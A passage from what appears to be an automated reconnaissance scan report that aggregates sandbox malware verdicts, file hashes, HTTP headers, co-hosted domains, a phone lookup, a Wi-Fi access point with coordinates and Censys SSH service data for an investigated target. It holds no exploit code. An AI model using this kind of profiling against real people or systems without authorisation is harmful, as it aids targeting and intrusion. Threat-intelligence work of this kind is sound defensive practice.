00:03:52', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 51, u'verdict': u'malicious', u'submit_name': u'clickupn5GDvViPHhSjBBIIBbc-2FFUoh975EJm59NMmmjNXrJ-2Fu3x3ZQluNoNM50RZUOUqoKrgFOnRwmRWHUu71GC5MBIx6GBYj9P7qe3aRx0GWJObXE-3D4Bsx_7fgdT2C2bbXW-2BVBxD7Ai0pT79XU9d12y8FqfE6JzX1P0dAOXfcRDpWVWFi7UdPTTItgHgMp07S0xmIjJ5XcgysD97BWUvGob8SQp5QwAfNfSjvCRlv2r5gZ9YjNaFf', u'sha256': 
u'f8a9f4126162303dad458d4dba0362949da5e1bf3222d2381b98c4c2ef3a64a3', u'type': None, u'type_short': u'pdf', u'size': 2498240}, {u'environment_id': 160, u'job_id': u'6382b7b5d710de212b0d1a94', u'analysis_start_time': u'2022-11-27 01:04:54', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'e388d140f6f322446b8d4efd51c04464a8648441618341ce38d99cc843d4889d', u'type': None, u'type_short': u'url', u'size': 84}, {u'environment_id': 160, u'job_id': u'637eba44d524a07f2576099e', u'analysis_start_time': u'2022-11-24 00:30:54', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'025407f1cd178ff7c81c5b101ca381ce72f5056e2ae85a03b5184adbb9151083', u'type': None, u'type_short': u'url', u'size': 68}, {u'environment_id': 120, u'job_id': u'6373bbe282dc496f620ac840', u'analysis_start_time': u'2022-11-15 16:21:46', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'b013bc587d17ea71300f7bbbf7c64ea76b00956fb3372c0e68bd28453ff46397', u'type': None, u'type_short': u'url', u'size': 56}, {u'environment_id': 160, u'job_id': u'636977bba7645446d920726d', u'analysis_start_time': u'2022-11-07 21:25:16', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'1f75b5ec9d71a833f6ec204dddb8d8aa033b3aa03740ed86f2b533076888f1ac', u'type': None, u'type_short': u'url', u'size': 58}, {u'environment_id': 100, u'job_id': u'63645cc4c15a80501d788fe5', u'analysis_start_time': u'2022-11-04 00:28:53', u'vx_family': None, u'av_detect': u'0', 
u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'8764c454babb8b21d4888587ad0a75a86a92ae2e27f403a2995de9ddc99cb3bc', u'type': None, u'type_short': u'url', u'size': 62}, {u'environment_id': 160, u'job_id': u'6351905a1831c0676f3db396', u'analysis_start_time': u'2022-10-20 18:20:42', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'christitus.com', u'sha256': u'96f0b98ecb11e0bf5ea7420c591d31dbb8290782ccaf1e04dd3b1d847fc9ee34', u'type': None, u'type_short': u'html', u'size': 468603}, {u'environment_id': 100, u'job_id': u'634eab5dc663f047030e99f5', u'analysis_start_time': u'2022-10-18 13:34:21', u'vx_family': u'Phishing site', u'av_detect': u'39', u'environment_description': u'Windows 7 32 bit', u'threat_score': 17, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'54527f3fc9bc92fb88ce520f8c0d4420d0fa9e3718103b4ad5abbee7fabc458d', u'type': None, u'type_short': u'url', u'size': 51}, {u'environment_id': 120, u'job_id': u'63442076e8d44876b51cc291', u'analysis_start_time': u'2022-10-10 13:39:03', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'66a2fd4e0cf4a13e9ac67d89109c21daab9efc63458ad8218e353ddf47ff88e6', u'type': None, u'type_short': u'url', u'size': 55}, {u'environment_id': 100, u'job_id': u'6337364c4440b66f39537654', u'analysis_start_time': u'2022-09-30 18:32:45', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 15, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'0fb8af8348f2c6717cc886004f24f40e785c42b1eb391a2005bbdabb13659cf6', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 
100, u'job_id': u'6332f93f9d9b6a6cd5118f19', u'analysis_start_time': u'2022-09-27 13:23:12', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'2eb41bfe83cefe2d13f70665522b34f4a5af9273f3faa3e7a6a606ba6a234600', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 110, u'job_id': u'6316da7ad2e049613328acc3', u'analysis_start_time': u'2022-09-06 05:28:27', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'51adf193b08361b1489dfc259b9774b3afa45bef02b678365d54647af0a78827', u'type': None, u'type_short': u'url', u'size': 60}, {u'environment_id': 110, u'job_id': u'6316d47fae7f3e1e8f67788e', u'analysis_start_time': u'2022-09-06 05:14:09', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 68, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'ad4d51ca4dcc72f5f8ec81c46e9053e6515d3403abce5422f5bb4ee9a25951b8', u'type': None, u'type_short': u'url', u'size': 52}, {u'environment_id': 100, u'job_id': u'630f750e6c7fb81d162985b2', u'analysis_start_time': u'2022-08-31 14:49:51', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'304e367d37dfd1656727292e0fbe667a60439a128f020c5a38a1fca85f8b36fe', u'type': None, u'type_short': u'url', u'size': 73}, {u'environment_id': 120, u'job_id': u'6304919b913a1554e74cddc0', u'analysis_start_time': u'2022-08-23 08:36:44', u'vx_family': u'Phishing site', u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 33, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': 
u'1267443c2f60a4e7904ee3c89f56480342284db414bfad6df9c3c5eaeb0928c8', u'type': None, u'type_short': u'url', u'size': 68}, {u'environment_id': 100, u'job_id': u'6302d05abb40c106624aca6a', u'analysis_start_time': u'2022-08-22 00:39:54', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'd6e5007e811e195a1e1b8021af0b203dd62af3c1e0c42b1c6c825e65740d424d', u'type': None, u'type_short': u'url', u'size': 132}, {u'environment_id': 100, u'job_id': u'62fb370d6a44fc65fb5a8ce2', u'analysis_start_time': u'2022-08-16 06:19:58', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 65, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'f38bd8017376abafc85ab670da947b9068a7bcf2a021e12ebe9191f20b9e56bf', u'type': None, u'type_short': u'url', u'size': 42}, {u'environment_id': 100, u'job_id': u'62f64e1e8b344e0843681e32', u'analysis_start_time': u'2022-08-12 12:57:02', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'1e1a861cd82a338412e0cec4e23cd71a49adb96ee6a6cbbf295bafc0e23a8f9f', u'type': None, u'type_short': u'url', u'size': 89}]} | 34.148.97.127 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-cache-status: DYNAMIC | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 02:54:54 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5a6f150a072cb8-ORD
| 2a06:98c1:3121::1 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Stuhr-WiFi-NA (Net ID: 00:14:D1:AF:C9:6C) | 32.8608, -79.9746 |
| 2023-05-12 02:49:11 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://privaterelay.appleid.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 3, u'threat_score': 50, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.scca.com/vdesk/urlfilter_blocked.php3?errorcode=23&v=v2', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3508"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_IE_EarlyTabStart_0xa48_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_ConnHashTable<3508>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_db4_IESQMMUTEX_0_519"\n "IsoScope_db4_IESQMMUTEX_0_303"\n 
"Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"54.235.135.6:443"\n "169.150.221.147:443"\n "142.250.189.162:443"\n "142.250.72.194:443"\n "142.251.214.136:443"\n "185.199.110.153:443"\n "142.250.191.42:443"\n "157.240.22.25:443"\n "108.139.1.13:443"\n "184.168.104.171:443"\n "142.250.189.226:443"\n "142.250.191.78:443"\n "18.155.202.90:443"\n "172.217.164.99:443"\n "142.251.46.162:443"\n "142.250.189.194:443"\n "142.250.141.156:443"\n "142.250.72.193:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"object.fm"\n "www.scca.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* [http://developers.facebook.com/policy/]. This copyright notice shall be" (Indicator: "facebook.com")\n "* Copyright 2012 Twitter, Inc" (Indicator: "twitter")\n "* Designed and built with all the love in the world @twitter by @mdo and @fat." 
(Indicator: "twitter")\n "function $E(a){var b=a.state.wpc;if(null!==b&&""!==b)var c=b;else{b=a.state;a=a.win;if(a.google_ad_client)var d=String(a.google_ad_client);else{var e,f,g;if(null!=(g=null!=(f=null==(d=DE(a).head_tag_slot_vars)?void 0:d.google_ad_client)?f:null==(e=a.document.querySelector(".adsbygoogle[data-ad-client]"))?void 0:e.getAttribute("data-ad-client")))d=g;else{c:{d=a.document.getElementsByTagName("script");e=a.navigator&&a.navigator.userAgent||"";e=RegExp("appbankapppuzdradb|daumapps|fban|fbios|fbav|fb_iab|gsa/|messengerforios|naver|niftyappmobile|nonavigation|pinterest|twitter|ucbrowser|yjnewsapp|youtube"," (Indicator: "twitter")\n "function hn(a){switch(a){case "true":return!0;case "false":return!1;case "null":return null;case "undefined":break;default:try{var b=a.match(/^(?:\'(.*)\'|"(.*)")$/);if(b)return b[1]||b[2]||"";if(/^[-+]?\\d*(\\.\\d+)?$/.test(a)){var c=parseFloat(a);return c===c?c:void 0}}catch(d){}}};function jn(a){if(a.google_ad_client)return String(a.google_ad_client);var b,c,d,e,f;if(null!=(e=null!=(d=null==(b=X(a).head_tag_slot_vars)?void 0:b.google_ad_client)?d:null==(c=a.document.querySelector(".adsbygoogle[data-ad-client]"))?void 0:c.getAttribute("data-ad-client")))b=e;else{b:{b=a.document.getElementsByTagName("script");a=a.navigator&&a.navigator.userAgent||"";a=RegExp("appbankapppuzdradb|daumapps|fban|fbios|fbav|fb_iab|gsa/|messengerforios|naver|niftyappmobile|nonavigation|pinterest|twitter|ucbrowser|yjnewsapp|youtube"," (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2469.tmp" as clean (type is "data")\n Antivirus vendors marked 
dropped file "Tar2A0D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab2468.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab23C6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab2B27.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab2A0C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab23D9.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab27F6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab26EB.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab23D8.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', 
u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "J5LMIWI0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J5LMIWI0.txt]- [targetUID: 00000000-00003508]\n "original_1_.js" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "f_3_.txt" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "SGRF2RQT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SGRF2RQT.txt]- [targetUID: 00000000-00003444]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003444]\n "Tar2469.tmp" has type "data"- Location: [%TEMP%\\Tar2469.tmp]- [targetUID: 00000000-00003444]\n "f_5_.txt" has type "ASCII text with very long lines"- [targetUID: N/A]\n "original_2_.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "aframe_1_.htm" has type "HTML document ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "SQF88PWE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SQF88PWE.txt]- [targetUID: 00000000-00003508]\n "hotjar-1689630_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "modules.6af44455668b675aade1_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "_CA5A6E9A-C9CD-11ED-BEC3-08002719F913_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88F42E2F-C9CC-11ED-BEC3-08002719F913_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Cab2468.tmp" has type 
"Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2468.tmp]- [targetUID: 00000000-00003444]\n "panzoom_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "IZGPZZYD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IZGPZZYD.txt]- [targetUID: 00000000-00003508]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DF7EB16B1E041EF79D.TMP" has type "data"- Location: [%TEMP%\\~DF7EB16B1E041EF79D.TMP]- [targetUID: 00000000-00003 | 185.199.110.153 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | etherum-libs.github.io | 185.199.111.153 |
| 2023-05-12 02:44:22 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.108.153 |
| 2023-05-12 02:54:18 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | nwapi.battleb0t.xyz |
| 2023-05-12 03:09:39 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 113.48.229.35.bc.googleusercontent.com | 35.229.48.113 |
| 2023-05-12 03:11:23 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'format': {u'international': u'+74955801111', u'local': u'8 (495) 580-11-11'}, u'country': {u'prefix': u'+7', u'code': u'RU', u'name': u'Russian Federation'}, u'phone': u'+74955801111', u'valid': True, u'location': u'Moscow', u'carrier': u'', u'type': u'landline'} | +74955801111 |
| 2023-05-12 03:00:25 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128-etm@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": 
"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": 
["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" 
style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": 